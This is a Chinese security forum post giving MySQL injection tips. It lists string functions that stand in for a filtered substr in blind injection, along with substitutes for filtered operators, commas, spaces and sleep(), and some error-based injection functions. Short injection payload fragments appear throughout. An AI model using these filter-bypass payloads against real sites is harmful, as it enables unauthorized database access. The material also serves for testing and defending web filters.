用户
搜索

[web安全] Mysql注入小技巧

该用户从未签到

i春秋-脚本小子

公众号:掌控安全EDU

Rank: 2

13

主题

27

帖子

230

魔法币
收听
0
粉丝
0
注册时间
2018-8-14
ZKAQ i春秋-脚本小子 公众号:掌控安全EDU 楼主
发表于 2020-10-9 14:41:08 34384
一、字符串截取函数
平时我们进行盲注时用substr()函数截取字符串,当substr()被过滤时,怎么办呢?
我们可以用这些函数可以达到同样的效果
1.left(str, length)
从左边第length位开始截取字符串
用法:left(str, length),即:left(被截取字符串, 截取长度)

SELECT LEFT('www.baidu.com',8)

结果为:www.baid
2.right(str,length)
从右边第length位开始截取字符串
用法:right(str, length),即:left(被截取字符串, 截取长度)
SELECT RIGHT('www.baidu.com',8)
结果为:aidu.com
3.substring(str,index,len)
截取特定长度的字符串
用法:
substring(str, pos),即:substring(被截取字符串, 从第几位开始截取)

substring(str, pos, length),即:
substring(被截取字符串,从第几位开始截取,截取长度)

(1).从字符串的第8个字符开始读取直至结束
SELECT SUBSTRING('www.baidu.com',8)
结果为:du.com

(2).从字符串的第8个字符开始,只取3个字符
SELECT SUBSTRING('www.baidu.com',8,3)
结果为:du.
4.mid(str,start,length)
截取str 从start开始,截取length的长度
mid()的用法等同于substr()这里就不多赘述了
5.substring_index(str, delim, count)
按关键字进行读取
用法:substring_index(str, delim, count),即:substring_index(被截取字符串,关键字,关键字出现的次数)
(1).截取第二个“.”之前的所有字符
SELECT SUBSTRING_INDEX('www.baidu.com', '.', 2);
结果:www.baidu
[size=1em](2).截取倒数第二个“.”之后的所有字符
SELECT SUBSTRING_INDEX('www.baidu.com', '.', -2);
结果:baidu.com
[size=1em](3).如果关键字不存在,则返回整个字符串
SELECT SUBSTRING_INDEX('www.baidu.com', 'zkaq', 1);
结果: www.baidu.com
substring_index()可以在布尔盲注时使用,先随便截取一个不可能的值。
那么页面肯定返回正常,如:
and substring_index(database(),'qwasda',1)=database()'
6.Locate(substr,str)
返回字符串的位置
用法1:
LOCATE(substr,str)返回字符串substr中第一次出现str的位置
例:返回字符串“d”自一次出现的位置
SELECT locate("d",'www.baidu.com');

结果:8
用法2:
LOCATE(substr,str,pos)返回substr 在字符串str,从pos处开始的第一次出现的位置
例:从字符串”pan.baidu.com”的第三位开始计算,返回字符“a”第一次出现的位置
SELECT locate("a",'pan.baidu.com',3);

结果:6

locate()还可以判断字符串长度

select locate('m','m123456m',15);

微信图片_20201009112532.png
7.instr (substr,str)
返回字符串的位置等同于locate(),但语法相反
用法:instr(substr,str)返回字符串substr中第一次出现str的位置
例:返回字符串“d”自一次出现的位置
SELECT instr('www.baidu.com',"d");
结果:8
8.position (substr IN str)
position (substr IN str)的效果与instr(),locate()相同,但语法不同
用法:POSITION(substr IN str) 返回字符串substr中第一次出现str的位置与LOCATE(substr,str)的结果相同
例:返回字符串“d”自一次出现的位置
SELECT position("d"in'www.baidu.com');
结果:8
9.strcmp()
若所有的字符串均相同,则返回STRCMP(),
若根据当前分类次序,第一个参数小于第二个,则返回-1,其它情况返回1
用法:
  • mysql> SELECT STRCMP(12345,123456);
  • ->-1
  • mysql> SELECT STRCMP(1234567,123456);
  • ->1
  • mysql> SELECT STRCMP(123456,123456);
  • ->0

二、替代逻辑运算符
我们在注入时,用的最多的是什么?
在测试是否有注入点时,经常会用到and 1=1,
如果and、等于号”=”等这些逻辑运算符被过滤无法使用时,
我们是不是就此放弃了,这时候我们可以用一些特殊的符号替代
1.替代and
当and被过滤时,可以用”&&”替代
Index.php?id = 1 and 1=1等同于Index.php?id = 1 && 1=1
2.替代or
当or被过滤时,可以用”||”替代
Index.php?id = 1.1 or 1=1等同于Index.php?id = 1.1 || 1=1
3.替代异或运算符”^”
当异或运算符”^”被过滤时,可以用”XOR”替代
select 1=1 XOR 1=1等同于select 1=1 ^ 1=1
4.替代等于号”=”
等于号”=”被过滤时,可以用多种方法替代
(1)Between://在什么与什么之间

select database() between 0x61 and 0x7a;

(2)in:// mysql中in常用于where表达式中,其作用是查询某个范围内的数据

SELECT * FROM user WHERE uid IN (2,3,5)

(3)Like //模糊查询,也可以当等于号用

Index.php?id = 1.1 or 1 like 1等同于Index.php?id = 1.1 or1 like 1

(4)使用正则代替等于号

SELECT ‘Hern’ REGEXP ‘[0-9]’;

Rlike === regexp

REGEXP等同于RLIKE
5.替代逗号”,”
union select 1,2,3 => union select * from (select 1)a join (select 2)b join (select 3)c;
6.替代空格
%20 %09 %0a %0b %0c %0d %a0 /**/ tab/
%a0 这个不会被php的\s进行匹配
/*!/ 内敛注释
# 这个也可以用来做分隔 挺有意思
7.替代NULL
\N => null
select *from duomi_admin where id=\N
三、一些小技巧1.替代sleep()
BENCHMARK(100000,SHA1(‘1’)), 1
BENCHMARK函数是指执行某函数的次数,次数多时能够达到与sleep函数相同的效果
2.函数名和括号之间可以加入特殊字符
concat/**/()
version()
3.花式报错注入
Floor()
Updatexml() //5.1.5以上才能使用
Extractvalue() //5.1.5以上才能使用
Exp() //5.5.5后可以用
Name_const
geometrycollection(),multipoint(),Polygon(),multipolygon(),linestring(),multilinestring() 几何函数报错
[size=1.5em] 微信图片_20201009112532.png
4.替代ascii
Hex()
Bin()
Ord()

本帖被以下淘专辑推荐:

  • · sc|主题: 63, 订阅: 3
发表于 2020-10-11 11:39:57
欢迎进内部学习交流群,领取黑客教程视频及工具等

使用道具 举报 回复
发表于 2020-10-9 18:13:20
学习啦
使用道具 举报 回复
发表于 2020-10-10 09:52:45
get
使用道具 举报 回复
发新帖
您需要登录后才可以回帖 登录 | 立即注册